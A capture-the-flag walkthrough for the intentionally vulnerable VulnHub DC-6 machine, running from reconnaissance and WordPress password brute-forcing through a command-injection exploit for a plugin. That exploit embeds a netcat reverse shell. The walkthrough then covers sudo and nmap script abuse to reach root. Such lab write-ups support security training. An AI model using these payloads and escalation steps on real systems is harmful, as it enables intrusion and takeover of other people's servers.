CTF Walk Through | HackProof Academy | [email protected]

2 subscriber(s)


06/12/2024 Shad Hussain Knowledge Views 175 Comments 0 Analytics Video English DMCA Add Favorite Copy Link
CTF Walk Through - DC6 - VulnHub

Machine Link : https://www.vulnhub.com/entry/dc-6,315/ STEP1 arp-scan -l FINDING 192.168.31.132 --------------------------------------------------------------------------------------------------------------- STEP2 nmap 192.168.31.132 -p- -Pn -A -T4 -sSV FINDING 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0) 80/tcp open http Apache httpd 2.4.25 ((Debian)) --------------------------------------------------------------------------------------------------------------- STEP3 nano /etc/hosts 192.168.31.132 wordy ctrl+x ctrl+y enter --------------------------------------------------------------------------------------------------------------- STEP4 wpscan --url http://wordy -e at -e ap -e u FINDING User(s) Identified: admin mark graham sarah jens --------------------------------------------------------------------------------------------------------------- STEP5 dirb http://wordy FINDING + http://wordy/wp-admin/admin.php (CODE:302|SIZE:0) --------------------------------------------------------------------------------------------------------------- STEP6 HINT IN THE DC-6 VULNHUB PAGE cat /usr/share/wordlists/rockyou.txt | grep k01 passwords.txt wpscan --url http://wordy/wp-login.php -U /root/Desktop/dc5users.txt -P /root/Desktop/passwords.txt FINDING | Username: mark, Password: helpdesk01 --------------------------------------------------------------------------------------------------------------- STEP7 http://wordy/wp-admin/admin.php Username: mark, Password: helpdesk01 on left menu you will get Activity Monitor searchsploit activity monitor FINDING Activity Monitor 2002 2.6 - Remote Denial of Service | windows/dos/22690.c RedHat Linux 6.0/6.1/6.2 - pam_console Monitor Activity After Logout | linux/local/19900.c WordPress Plugin Plainview Activity Monitor 20161228 - (Authenticated) Command Injec | php/webapps/45274.html WordPress Plugin Plainview Activity Monitor 20161228 - Remote Code Execution (RCE) ( | php/webapps/50110.py --------------------------------------------------------------------------------------------------------------- STEP7 https://www.exploit-db.com/exploits/45274 wget https://www.exploit-db.com/download/45274 make some changes in the CRSF exploit as html !-- Wordpress Plainview Activity Monitor RCE [+] Version: 20161228 and possibly prior [+] Description: Combine OS Commanding and CSRF to get reverse shell [+] Author: LydA(c)ric LEFEBVRE [+] CVE-ID: CVE-2018-15877 [+] Usage: Replace 127.0.0.1 & 9999 with you ip and port to get reverse shell [+] Note: Many reflected XSS exists on this plugin and can be combine with this exploit as well -- body scripthistory.pushState(, , /)/script form action="http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data" input type="hidden" name="ip" value="google.fr| nc 192.168.31.28 9999 -e /bin/bash" / input type="hidden" name="lookup" value="Lookup" / input type="submit" value="Submit request" / /form /body /html --------------------------------------------------------------------------------------------------------------- STEP8 on new terminal nc -nvlp 9999 open the html exploit and press the button get revers connection --------------------------------------------------------------------------------------------------------------- STEP9 python -c import pty; pty.spawn("/bin/bash") cd /home/mark/stuff ls -la cat things-to-do.txt FINDING - Add new user: graham - GSo7isUM1D4 - done we got graham password su graham GSo7isUM1D4 --------------------------------------------------------------------------------------------------------------- STEP10 sudo -l FINDING (jens) NOPASSWD: /home/jens/backups.sh --------------------------------------------------------------------------------------------------------------- STEP11 echo /bin/bash /home/jens/backups.sh sudo -u jens /home/jens/backups.sh sudo -l FINDING (root) NOPASSWD: /usr/bin/nmap echo "os.execute(/bin/sh)"/tmp/root.nse sudo nmap --script=/tmp/root.nse whoami root cd /root ls -la cat theflag.txt Yb dP 888888 88 88 8888b. dP"Yb 88b 88 888888 d8b Yb db dP 88__ 88 88 8I Yb dP Yb 88Yb88 88__ Y8P YbdPYbdP 88"" 88 .o 88 .o 8I dY Yb dP 88 Y88 88"" `" YP YP 888888 88ood8 88ood8 8888Y" YbodP 88 Y8 888888 (8) Congratulations!!! ---------------------------------------------------------------------------------------------------------------

Related articles

 WhatsApp no. else use your mail id to get the otp...!    Please tick to get otp in your mail id...!
 





© mutebreak.com | All Rights Reserved